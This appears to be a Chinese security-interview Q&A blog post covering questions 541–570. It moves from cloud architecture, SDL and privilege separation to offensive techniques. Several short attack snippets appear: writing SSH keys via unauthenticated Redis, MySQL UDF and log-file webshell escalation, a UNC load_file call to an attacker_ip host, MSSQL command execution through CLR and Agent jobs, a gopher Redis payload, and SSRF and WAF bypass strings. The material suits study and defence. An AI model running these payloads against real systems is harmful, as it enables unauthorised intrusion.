安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[541. 传统IDC/云上/混合云安全差异与挑战](#541. 传统IDC/云上/混合云安全差异与挑战)
[542. 云原生安全变化](#542. 云原生安全变化)
[543. 纯云业务安全架构设计](#543. 纯云业务安全架构设计)
[544. SDL关键点与解决方案](#544. SDL关键点与解决方案)
[545. 甲方 vs 乙方漏洞发现差异](#545. 甲方 vs 乙方漏洞发现差异)
[546. 防御0day攻击策略](#546. 防御0day攻击策略)
[547. 企业安全建设阶段侧重](#547. 企业安全建设阶段侧重)
[548. 安全架构设计实践](#548. 安全架构设计实践)
[549. 安全团队协作关系](#549. 安全团队协作关系)
[550. 误报 vs 漏报权衡模型](#550. 误报 vs 漏报权衡模型)
[551. 有限人力下最大化蓝军价值](#551. 有限人力下最大化蓝军价值)
[552. 应用安全审计流程](#552. 应用安全审计流程)
[553. 权限分离与最小化](#553. 权限分离与最小化)
[554. CISP/CISSP核心知识点](#554. CISP/CISSP核心知识点)
[555. 转岗/离职安全流程设计](#555. 转岗/离职安全流程设计)
[556. 绕过CDN找真实IP的5种方法](#556. 绕过CDN找真实IP的5种方法)
[557. Redis未授权利用](#557. Redis未授权利用)
[558. MySQL提权方式](#558. MySQL提权方式)
[559. 无外网权限的SQL注入利用](#559. 无外网权限的SQL注入利用)
[560. 隐蔽信息收集技巧](#560. 隐蔽信息收集技巧)
[561. SRC挖掘 vs 渗透测试](#561. SRC挖掘 vs 渗透测试)
[562. 内网存储XSS利用](#562. 内网存储XSS利用)
[563. MSSQL无xp_cmdshell执行命令](#563. MSSQL无xp_cmdshell执行命令)
[564. WAF绕过分场景策略](#564. WAF绕过分场景策略)
[565. 实战挖洞案例:酒店预订系统](#565. 实战挖洞案例:酒店预订系统)
[566. CSRF防御无Token方案](#566. CSRF防御无Token方案)
[567. SSRF防御纵深设计](#567. SSRF防御纵深设计)
[568. SSRF探测非HTTP协议](#568. SSRF探测非HTTP协议)
[569. SSRF绕过手法](#569. SSRF绕过手法)
[570. DNS重绑定原理与修复](#570. DNS重绑定原理与修复)
541 传统IDC、云上、混合云架构的安全差异和各自挑战是什么? 542 云原生技术下的安全变化? 543 纯云业务如何设计安全架构? 544 SDL中的关键点是什么以及如何解决? 545 漏洞发现在甲方和乙方做有什么区别? 546 如何防止0day攻击? 547 对于企业不同时期、不同阶段、不同体量的安全建设的方法、区别以及侧重 548 你所做过的安全架构图和所期望的安全架构 549 安全与其他团队(运维、研发、测试、GR/PR、内控、高管及三方安全公司)的关系 550 误报和漏报如何权衡? 551 如何在有限的人力下最大化突出蓝军价值? 552 如何对一个应用进行安全审计? 553 如何理解权限分离、最小化权限? 554 考察一些CISP、CISSP的知识点 555 挑选一些较为复杂的流程,比如转岗、离职等,如何设计考虑其中的细节 556 如何绕过CDN找到真实IP,请列举五种方法 557 redis未授权访问如何利用,利用的前提条件是? 558 mysql提权方式有哪些?利用条件是什么? 559 windows+mysql,存在sql注入,但是机器无外网权限,可以利用吗? 560 常用的信息收集手段有哪些,除去路径扫描,子域名爆破等常见手段,有什么猥琐的方法收集企业信息? 561 SRC挖掘与渗透测试的区别是什么,针对这两个不同的目标,实施过程中会有什么区别 562 存储xss在纯内网的环境中,可以怎么利用? 563 mssql中,假设为sa权限,如何不通过xp_cmdshell执行系统命令 564 假设某网站存在waf,不考虑正面绕过的前提下,应该如何绕过(分情况讨论 云waf/物理waf) 565 介绍一下自认为有趣的挖洞经历(或CTF经历) 566 CSRF的成因及防御措施(不用token如何解决) 567 SSRF的成因及防御措施 568 SSRF如何探测非HTTP协议 569 简述一下SSRF的绕过手法 570 简述一下SSRF中DNSRebind的绕过原理及修复方法541. 传统IDC/云上/混合云安全差异与挑战
Mermaid
graph TD A[传统IDC] --> A1[物理边界防护] A --> A2[静态IP策略] A --> A3[挑战:扩容慢/成本高] B[公有云] --> B1[动态资源池] B --> B2[API驱动安全] B --> B3[挑战:配置错误/多租户风险] C[混合云] --> C1[统一策略管理] C --> C2[数据流可视性] C --> C3[挑战:跨云合规/密钥同步]
542. 云原生安全变化
技术变革:
- 容器安全:镜像签名+运行时监控(Falco)
- 服务网格:mTLS自动加密通信链路
- 无服务器安全:函数级权限隔离(AWS Lambda IAM)
- 挑战:临时实例取证困难、K8s RBAC配置错误
543. 纯云业务安全架构设计
分层架构:
Plaintext
1. 接入层:WAF+API网关(身份认证) 2. 计算层:主机安全Agent+容器沙箱 3. 数据层:TDE加密+动态脱敏 4. 运维层:云原生SIEM(如Azure Sentinel)关键策略:
- 基础设施即代码(IaC)扫描:Checkov检测Terraform配置风险
- 零信任网络:基于身份的服务间授权(SPIFFE/SPIRE)
544. SDL关键点与解决方案
阶段 痛点 解决方案 需求阶段 安全需求模糊 威胁建模(STRIDE)量化风险 开发阶段 开发人员安全意识不足 安全组件白盒化(如RSA库封装) 测试阶段 自动化覆盖率低 SAST+DAST+IAST三引擎联动 响应阶段 漏洞修复延迟 热补丁机制(如Red Hat Live Patching)
545. 甲方 vs 乙方漏洞发现差异
维度 甲方 乙方 目标深度 业务逻辑漏洞深耕 通用漏洞快速扫描 工具投入 定制化扫描器(如内部协议) 商业工具(BurpSuite Pro) 修复驱动 直接推动业务线修复 报告驱动客户响应
546. 防御0day攻击策略
分层防控:
Mermai
graph LR A[网络层] --> A1[IPS签名更新] A --> A2[微分段隔离] B[主机层] --> B1[内存防护(如ASLR)] B --> B2[行为沙箱] C[应用层] --> C1[RASP拦截] C --> C2[WAF虚拟补丁]
547. 企业安全建设阶段侧重
阶段 核心目标 建设重点 初创期 基础防护 边界防火墙+基础身份认证 成长期 合规驱动 ISO27001落地+日志审计 成熟期 主动防御 威胁狩猎+红蓝对抗 生态期 供应链安全 S-SDLC+第三方风险管理
548. 安全架构设计实践
现有架构示例:
Plaintext
[用户] --> [CDN] --> [WAF] --> [API网关] --> [微服务] --> [DB] │ └── [云SIEM] ← [EDR] + [NIDS]理想架构:
- 零信任架构:持续设备健康检查
- 数据安全网格:动态按需解密(如KeyShield)
549. 安全团队协作关系
关键接口:
- 研发:安全组件嵌入CI/CD流水线
- 运维:安全策略自动化部署(Ansible Tower)
- GR/PR:安全事件统一话术管理
- 三方公司:渗透测试结果双向验证
550. 误报 vs 漏报权衡模型
风险系数=漏报危害值×发生概率误报处理成本×频率风险系数=误报处理成本×频率漏报危害值×发生概率
落地实践:
- 高误报场景:机器学习模型二次确认(如Suricata+AI)
- 高漏报风险:威胁情报驱动检测(如Talos情报订阅)
551. 有限人力下最大化蓝军价值
聚焦策略:
- 精准打击:每年1次全量渗透 + N次定向攻击(如新业务上线)
- 武器化输出:将攻击手法转化为自动化检测规则
- 紫军协同:与防御团队共建自动化响应剧本(SOAR)
552. 应用安全审计流程
六步法:
Plaintext
1. 架构审查:数据流图威胁建模 2. 代码扫描:Semgrep+人工复核 3. 配置核查:K8s RBAC/DB权限矩阵 4. 动态测试:API Fuzz(如Burp Intruder) 5. 权限测试:垂直/水平越权验证 6. 日志溯源:用户行为链重建
553. 权限分离与最小化
实施要点:
- 角色设计:基于RBAC的动态职责分离(如AWS IAM Roles)
- 权限时效:Just-In-Time访问(如Teleport临时特权)
- 执行环境:敏感操作在隔离沙箱执行(如AWS Lambda)
- 审计保障:特权命令录像(如Teleport Session Recording)
554. CISP/CISSP核心知识点
重点域:
- CIA三元组:可用性≠可靠性(如DDoS破坏可用性)
- 访问控制模型:RBAC vs ABAC vs MAC
- 加密应用:数字签名(非对称) vs MAC(对称)
- BCP/DRP:RTO/RPO量化(金融行业RTO<5min)
555. 转岗/离职安全流程设计
关键控制点:
Mermaid
graph LR A[发起流程] --> B[权限回收预检] B --> C[数据资产交接] C --> D[设备安全擦除] D --> E[离职后审计]细节:
- 权限回收延迟:设置缓冲期(如3天)并监控异常操作
- 数据防泄露:DLP扫描离职员工外发行为
556. 绕过CDN找真实IP的5种方法
- 历史DNS记录:SecurityTrails查询域名变更
- SSL证书匹配:Censys搜索相同证书的IP
- 子域名泄露 :
test.example.com可能直连后端- 邮件服务器:从邮件头提取发送IP
- 云服务元数据 :AWS实例的
user-data可能含内网IP
557. Redis未授权利用
利用条件:
- 未配置密码认证
- 可远程连接(默认6379开放)
攻击步骤:
Bash
# 写SSH公钥 redis-cli -h target set key "$(cat ~/.ssh/id_rsa.pub)" config set dir /root/.ssh/ config set dbfilename authorized_keys save
558. MySQL提权方式
方法 条件 命令示例 UDF提权 FILE权限+插件目录写权限 CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.so';日志文件注入 全局FILE权限 SET global general_log_file='/var/www/shell.php';启动脚本篡改 root权限运行MySQL 注入 /etc/init.d/mysql
559. 无外网权限的SQL注入利用
内网渗透手法:
SMB中继攻击 :通过MySQL读取攻击载荷(需UNC路径支持)
Sql
SELECT load_file('\\attacker_ip\share\shell.php')时间盲注代理:利用响应延迟传递数据(需控制多参数)
560. 隐蔽信息收集技巧
- 招聘信息挖掘:从JD获取技术栈(如"使用Kong网关")
- 供应链溯源 :npm包
package.json发现内部域名- 法律文书:裁判文书网搜公司名找技术细节
- GitHub代码片段:搜索公司邮箱后缀找员工开源项目
561. SRC挖掘 vs 渗透测试
维度 SRC挖掘 渗透测试 授权范围 全互联网资产(无明确边界) 限定IP/域名范围 目标导向 漏洞数量/严重性 业务风险全覆盖 时间投入 持续性 项目制(2-4周)
562. 内网存储XSS利用
内网特权场景:
- 管理员劫持:窃取管理Cookie接管后台
- 网络探测 :通过XHR扫描内网服务(如
http://192.168.1.1:8080)- 客户端漏洞:结合IE 0day下载木马
563. MSSQL无xp_cmdshell执行命令
替代方案:
Sql
-- 通过CLR程序集 CREATE ASSEMBLY ExecShell FROM 'c:\shell.dll' CREATE PROCEDURE sp_exec AS EXTERNAL NAME ExecShell.StoredProcedures.Cmd EXEC sp_exec 'whoami' -- 利用Agent作业(需sysadmin) EXEC msdb.dbo.sp_add_job @job_name='evil' EXEC msdb.dbo.sp_add_jobstep @job_name='evil', @command='cmd /c calc' EXEC msdb.dbo.sp_start_job 'evil'
564. WAF绕过分场景策略
云WAF绕过:
- IP轮询:寻找未防护的CDN边缘节点
- 协议兼容性:HTTP/2走私请求
- 地域探测:通过海外IP访问可能无WAF
硬件WAF绕过:
- TCP策略:慢速攻击耗尽会话表
- 规则集差异:测试WAF品牌已知误报(如Imperva CVE-2020-XXXX)
565. 实战挖洞案例:酒店预订系统
漏洞链:
Mermaid
graph LR A[IDOR泄露订单] --> B[预订信息修改] B --> C[积分盗刷] C --> D[支付回调篡改]关键点:
- 发现预订ID为自增整数,遍历他人订单
- 修改回调URL参数实现0元支付
- 组合漏洞获$5000 SRC奖金
566. CSRF防御无Token方案
替代方案:
- 同源检测 :校验
Origin头(需现代浏览器)- 双重Cookie :前端读Cookie写入自定义头(如
X-CSRF-TOKEN)- 行为验证:敏感操作需密码二次确认
567. SSRF防御纵深设计
分层防护:
Plaintext
1. 输入校验:禁用非标准URL Scheme(如file://) 2. 网络隔离:出口流量强制代理(仅允许HTTP/HTTPS) 3. 响应过滤:拦截非常规响应(如302跳转私有IP) 4. 权限控制:应用程序使用独立出网身份
568. SSRF探测非HTTP协议
探测手法:
- DNS回连 :
dict://<ip>:53/resolve?name=evil.com- gopher弹Shell :构造Redis协议
gopher://:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a- FTP被动模式:触发FTP服务返回端口开放信息
569. SSRF绕过手法
经典绕过:
- IPv6兼容 :
http://[::1]:80- 域名重解析 :
xip.io→127.0.0.1.xip.io- URL畸形 :
http://127.0.0.1%0d%0a.example.com- DNS重绑定:TTL=0时快速切换IP
570. DNS重绑定原理与修复
原理:
Mermaid
sequenceDiagram 用户->>恶意网站: 访问 evil.com 恶意网站->>DNS: 响应真实IP(首次) DNS->>用户: 返回IP1 用户->>IP1: 发起SSRF请求 恶意网站->>DNS: 切换为127.0.0.1(TTL=0) 用户->>127.0.0.1: 请求被重绑定修复:
- 应用层DNS缓存:解析域名后缓存IP至会话结束
- 网络层管控:禁止容器环境发起点A记录查询